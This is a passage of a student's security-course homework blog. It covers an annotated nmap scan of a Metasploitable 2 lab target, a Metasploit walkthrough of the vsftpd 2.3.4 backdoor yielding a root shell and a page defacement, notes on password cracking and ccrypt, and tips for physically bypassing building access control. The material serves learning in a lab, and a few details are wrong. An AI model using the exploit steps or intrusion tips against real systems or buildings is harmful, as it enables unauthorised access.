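    "file sharing": {"netbios-ssn", "microsoft-ds", "nfs"},
    "remote desktop": {"vnc", "X11"},
}


def parse_scan(text):
    """Turn nmap -sV lines into (port, proto, state, service, version) tuples."""
    rows = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            port, proto, state, service, version = m.groups()
            rows.append((int(port), proto, state, service, version.strip()))
    return rows


def triage(rows):
    """Group open ports by category; 'backdoor' is keyed on the version text."""
    findings = {name: [] for name in CATEGORIES}
    findings["backdoor"] = []
    for port, _proto, state, service, version in rows:
        if state != "open":
            continue
        if service == "bindshell" or "root shell" in version.lower():
            findings["backdoor"].append(port)
        for name, services in CATEGORIES.items():
            if service in services:
                findings[name].append(port)
    return findings
```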

Next scan is a bit wider, so I will just post parts of it I find interesting:
$ sudo nmap -A -p- 10.10.10.3
-A to enable OS detection, version detection, script scanning, and traceroute
-p- to scan ports from 1 through 65535

21/tcp open ftp vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)

FTP (File Transfer Protocol) is for file transfer. This ftp version has a backdoor vulnerability and the "Anonymous FTP login allowed" could be a way to look inside the server.
https://www.cvedetails.com/cve/CVE-2011-2523/

23/tcp open telnet Linux telnetd
Like ssh but uses plaintext, so the data and login information is not encrypted. Should not be used in public networks for this reason.
https://en.wikipedia.org/wiki/Telnet#Security

25/tcp open smtp Postfix smtpd
Simple Mail Transfer Protocol, so an email service.
https://en.wikipedia.org/wiki/Telnet#Security

53/tcp open domain ISC BIND 9.4.2
| dns-nsid:
|_ bind.version: 9.4.2

"BIND (Berkely Internet Name Domain) is a popular software for translating domain names into IP addresses and usually found on Linux servers."
First time I hear this name, but it seems to be a DNS server. Version 9.4.3 seems to be vulnerable to insertion of malicious DNS records into the DNS server. There are many exploits for this version, e.g. 'Remote DNS Cache Poisoning'.
https://www.cvedetails.com/cve/CVE-2008-1447/
https://www.cvedetails.com/vulnerability-list/vendor_id-64/product_id-144/version_id-436267/ISC-Bind-9.4.2.html

80/tcp open http Apache httpd 2.2.8 ((Ubuntu) DAV/2)
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS

Apache is a web server, here hosting the "front page" for Metasploitable 2 on http://10.10.10.3. The latest version now (11.02.2022) is 2.4.46, and version 2.2.8 has exploits. There could be other ways in through the web page itself.
https://www.cvedetails.com/cve-details.php?t=1&cve_id=CVE-2008-2364
https://www.cvedetails.com/cve-details.php?t=1&cve_id=CVE-2010-0408

111/tcp open rpcbind 2 (RPC #100000)
What RPC is or does did not become so clear to me.

139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)

Samba is used for file sharing with Windows clients.

512/tcp open exec netkit-rsh rexecd

This is a password-based remote execution program to allow users of a network to execute commands remotely. Should not be open.

513/tcp open login OpenBSD or Solaris rlogind
Remote login like Telnet or SSH, again a way in that should not be here.

514/tcp open shell Netkit rshd
Remote shell for sending commands to the server. Should not be open.

1099/tcp open java-rmi GNU Classpath grmiregistry
Java RMI registry service that allows remote Java calls to be made; it could be exploitable.

1524/tcp open bindshell Metasploitable root shell
Some kind of backdoor.

2049/tcp open nfs 2-4 (RPC #100003)
Linux Network File System for sharing data, why is this open?

3306/tcp open mysql MySQL 5.0.51a-3ubuntu5
5432/tcp open postgresql PostgreSQL DB 8.3.0 - 8.3.7

Database services, should not be accessible.
The MySQL version is from 2007 and the PostgreSQL version from 2008. Old versions could have vulnerabilities.

5900/tcp open vnc VNC (protocol 3.3)
| vnc-info:
| Protocol version: 3.3
| Security types:
|_ VNC Authentication (2)

Remote desktop access, old version and exploitable.
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0167

6667/tcp open irc UnrealIRCd
6697/tcp open irc UnrealIRCd

IRC servers, it's been a long time since I have used IRC, so it might be a good thing to check this out.

8009/tcp open ajp13 Apache Jserv (Protocol v1.3)
|_ajp-methods: Failed to get a valid response for the OPTION request
8180/tcp open http Apache Tomcat/Coyote JSP engine 1.1
|_http-server-header: Apache-Coyote/1.1
|_http-favicon: Apache Tomcat
|_http-title: Apache Tomcat/5.5

A few Apache-related services. Tomcat on port 8180 could be interesting to check out using the browser at 10.10.10.3:8180.
https://en.wikipedia.org/wiki/Apache_Tomcat

8787/tcp open drb Ruby DRb RMI (Ruby 1.8; path /usr/lib/ruby/1.8/drb)
Distributed Ruby, a Ruby programming library that allows remote method calls between Ruby processes on different machines.
Metasploit has an exploit for this version to get root access.
https://en.wikipedia.org/wiki/Distributed_Ruby

My thoughts

There are a lot of ports open, which is not normal.
Many of the programs running are old versions and are easily exploitable using ready-made exploits.
There are many different programs for remote access, each has its own users, and it is very difficult to manage them all.
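The per-port triage done by hand above can be automated against nmap's normal output. This is an added example, not part of the original write-up or of nmap: the sample scan lines are constructed from the scan above, and the RISKY table is an assumed policy that encodes the reasons given in the write-up.

```python
import re

# Constructed sample in the style of the nmap scan above (includes one line
# with the "tcpopen" spacing damage seen in the copied output).
SAMPLE_SCAN = """\
21/tcp open ftp vsftpd 2.3.4
23/tcp open telnet Linux telnetd
80/tcp open http Apache httpd 2.2.8 ((Ubuntu) DAV/2)
512/tcp open exec netkit-rsh rexecd
513/tcp open login OpenBSD or Solaris rlogind
514/tcp open shell Netkit rshd
1524/tcp open bindshell Metasploitable root shell
3306/tcp open mysql MySQL 5.0.51a-3ubuntu5
5900/tcp open vnc VNC (protocol 3.3)
42496/tcpopen status 1 (RPC #100024)
"""

# Assumed policy: services the write-up says should not be reachable, and why.
RISKY = {
    "telnet": "cleartext login",
    "exec": "remote execution (rexec)",
    "login": "remote login (rlogin)",
    "shell": "remote shell (rsh)",
    "bindshell": "known backdoor",
    "vnc": "remote desktop exposed",
    "mysql": "database reachable from the network",
    "postgresql": "database reachable from the network",
}

# port/proto, optional whitespace, "open", service, rest of line as version.
LINE_RE = re.compile(r"^(\d+)/(tcp|udp)\s*open\s+(\S+)\s*(.*)$")


def parse_nmap(text):
    """Return (port, proto, service, version) tuples from nmap-style lines."""
    found = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            found.append((int(m.group(1)), m.group(2), m.group(3), m.group(4)))
    return found


def triage(text):
    """Map each risky open port to the reason it should be closed or firewalled."""
    return {port: f"{svc}: {RISKY[svc]}"
            for port, _, svc, _ in parse_nmap(text) if svc in RISKY}


if __name__ == "__main__":
    for port, reason in sorted(triage(SAMPLE_SCAN).items()):
        print(f"{port:>5}  {reason}")
```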


Exercise F

f) Volunteer task: it's raining shells. Break into Metasploitable 2. As an added bonus, do it using multiple methods. Only do this using methods you're able to use safely, so that attacks only target Metasploitable 2 practice target.

Port 21

For this, I installed Kali Linux, and this will be my first time using it. I found out that the FTP server on port 21 is something I want to try out, so let's scan it again and see what I can do about it.
$ sudo nmap -p21 10.10.10.3 -A

The program is vsftpd and the version is 2.3.4. I can use Metasploit (The world's most used penetration testing framework, https://www.metasploit.com/ ) to find and use vulnerabilities. First I need to start it; it was already installed on Kali, so no need to do anything else.
$ msfconsole

To search I type:
msf6 > search vsftpd 2.3.4

One was found and it's 'Rank: excellent', so I think it will be good for us, let's use it.
msf6 > use 0
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > show options

Port is there already, I still need to add the IP.
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > set RHOSTS 10.10.10.3

The settings are good to go, start exploiting!
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > exploit

[*] 10.10.10.3:21 - Banner: 220 (vsFTPd 2.3.4)
[*] 10.10.10.3:21 - USER: 331 Please specify the password.
[+] 10.10.10.3:21 - Backdoor service has been spawned, handling...
[+] 10.10.10.3:21 - UID: uid=0(root) gid=0(root)
[*] Found shell.
[*] Command shell session 1 opened (10.10.10.4:43889 -> 10.10.10.3:6200 ) at 2022-02-13 04:45:26 -0500

I should be root and have the console open, let's try it!

Yes, I are root!

Time to test it!
I go to /var/www/
Here I have an index.php, let's do something to it.
echo "Johan was here!" >> index.php

And see the changes!


H5


Exercise Z

z) Read (or watch or listen) and summarize (This subtask z does not require tests with a computer. Some bullets per article is enough for your summary, feel free to write more if you like)
Schneier 2015: Applied Cryptography: Chapter 1: Foundations

Applied Cryptography

Symmetric: One key to encrypt and decrypt

Asymmetric: Different keys for encrypting and decrypting. The message is encrypted using the receiver's public key and can only be opened using the receiver's private key.

Substitution cipher: Replacing the plaintext letter for other characters

Steganography: Hiding the message inside some other data, like a picture.

Cryptography: Study of how to keep messages secure.

Cryptanalysis: Study of how to break encryption.

When sending a message that you do not want others to read, you first write it in plaintext; it is then encrypted into ciphertext and sent. At the receiving end the ciphertext is decrypted back to plaintext. Cryptography gives the message confidentiality and, to a certain degree, authentication as well when asymmetric algorithms are used.

Modern algorithms are based on complex mathematics. They are designed so that even if you know the algorithm, it is practically impossible to break it. The security therefore relies on the strength of the key used, which is why it is easier to try to break the key and gain access that way.
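A small illustration of the points above (added example, not code from Schneier's chapter or the course page): a shift cipher, the simplest substitution cipher, is encrypted with one symmetric key and then broken by cryptanalysis that knows the algorithm and only has to try every key. The message and the crude English-likeness score are constructed for the example; the weakness is the 26-value key space, not the arithmetic.

```python
import string

ALPHABET = string.ascii_uppercase


def encrypt(plaintext, key):
    """Shift cipher: each letter is replaced by the one `key` places later.
    One symmetric key (0-25) both encrypts and decrypts."""
    out = []
    for ch in plaintext.upper():
        if ch in ALPHABET:
            out.append(ALPHABET[(ALPHABET.index(ch) + key) % 26])
        else:
            out.append(ch)  # spaces and punctuation pass through unchanged
    return "".join(out)


def decrypt(ciphertext, key):
    """The same key undoes the shift: the symmetric property."""
    return encrypt(ciphertext, -key)


# Constructed scoring heuristic: frequent English letters count +1, rare ones -1.
COMMON = set("ETAOINSHR")
RARE = set("JQXZ")


def english_score(text):
    return sum((c in COMMON) - (c in RARE) for c in text)


def break_by_key_search(ciphertext):
    """Cryptanalysis with the algorithm public: try all 26 keys and keep the
    candidate that looks most like English. Returns (key, plaintext)."""
    best_key = max(range(26), key=lambda k: english_score(decrypt(ciphertext, k)))
    return best_key, decrypt(ciphertext, best_key)


if __name__ == "__main__":
    msg = "THE SECURITY IS IN THE KEY NOT THE ALGORITHM"  # constructed sample
    ct = encrypt(msg, 7)
    print(ct)
    print(break_by_key_search(ct))
```

A 128-bit key for a modern cipher would require 2^128 trials for the same attack, which is the difference the passage above is pointing at.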


Exercise A

a) Presentation material. Write down synopsis and key points of your presentation. Add some references. If you're using slides, feel free to link the PDF here in addition to synopsis.

All passwords can be cracked, all you need is time.

This is a short summary of my online presentation.

Passwords are becoming more complex with the increased use of password managers and automated password generation tools. The old wordlists are hardly working anymore, so I need to be smarter when cracking passwords. In this presentation I will talk about a few password cracking programs, wordlists and what you can do if a wordlist is not enough.

First, I will talk about Hydra, a login cracker that supports 35 protocols, used mostly on online services like SSH, FTP and MySQL. Cracking passwords over the network is always very loud, so if the target (NOTE: only attack targets you have permission to attack!) has active monitoring of any kind you will get noticed.

After this I will look at John the Ripper and how to crack a .rar file hash whose password is not in a wordlist. For this I use incremental mode; this could take months, so I need to take a look at the config file and see if I can do something to speed it up.

At the end you will have basic knowledge about password cracking, how to do it a bit smarter and understand what makes a good password and why.

Hydra
John the Ripper
What Is a Brute Force Attack?
Brute Force Attack: Definition and Examples
Brute Force - CheatSheet


Exercise B

b) Encrypt and decrypt a message using a tool of your choosing. Comment on the tool and the process.

Ccrypt

Ccrypt is used to encrypt and decrypt files and folders. It does not provide data integrity, so it will not detect if the encrypted file was modified after encryption. Encrypted files get the .cpt suffix. The program is very easy to use and works well; ease of use is not always evident, especially when it comes to Linux programs and using terminal commands.

I encrypted a textfile using the command:
$ ccencrypt test.txt
After this I gave a password and the file was encrypted.

For decryption I use
$ ccdecrypt test.txt
Just gave the password and it's open.


H6, Free ticket


Exercise Z

z) Read (or watch or listen) and summarize (This subtask z does not require tests with a computer. Some bullets per article is enough for your summary, feel free to write more if you like) two security conference presentations from different conferences. (This is about 1-2 hours [total] of video for typical conferences) Homework h6 z), terokarvinen.com

I'm in your office - Bypassing access control without social engineering - Antti Virtanen

https://www.youtube.com/watch?v=jW5XebI1PMg

Antti Virtanen talks about how to get into buildings without social engineering, damaging property or leaving evidence of the visit.

The target should always be scouted in full beforehand; you don't want to go in through a door and have no clue what's on the other side of it.
Things to consider in the preparation phase:
- Where are all the doors and windows?
- What type of access control system and locks are used?
- Who has access to different parts of the building?
- Where are the valuable assets you are after?
- Is there an alarm system, is it on a set timetable?
- Do the employees ask for ID cards, or could you just walk in tailing someone else?
- What tools could you need?

How to get access?
- Just walk in as if you belong there: dress like the employees, walk in after someone else who opens the door, or try doors that look closed, they could be unlocked.
Remember: if you use props, like a fake ID card, you can't say "sorry, I think I walked in by accident".
- Bypass the door, use a window, or climb over the fence
- Pick or use other methods to bypass the lock
- Tamper with the lock so that it does not lock, that way you can get access at a different time. Works well on side doors that are not used often
- Steal visitor badges from the front desk, if they are left unsupervised

What about digital access control?
Even the digital access control in new buildings is often not encrypted, authenticated or signed. This leads to many different ways to take advantage of the system. Access tags are easy to clone and there are a lot of different tag readers on the market.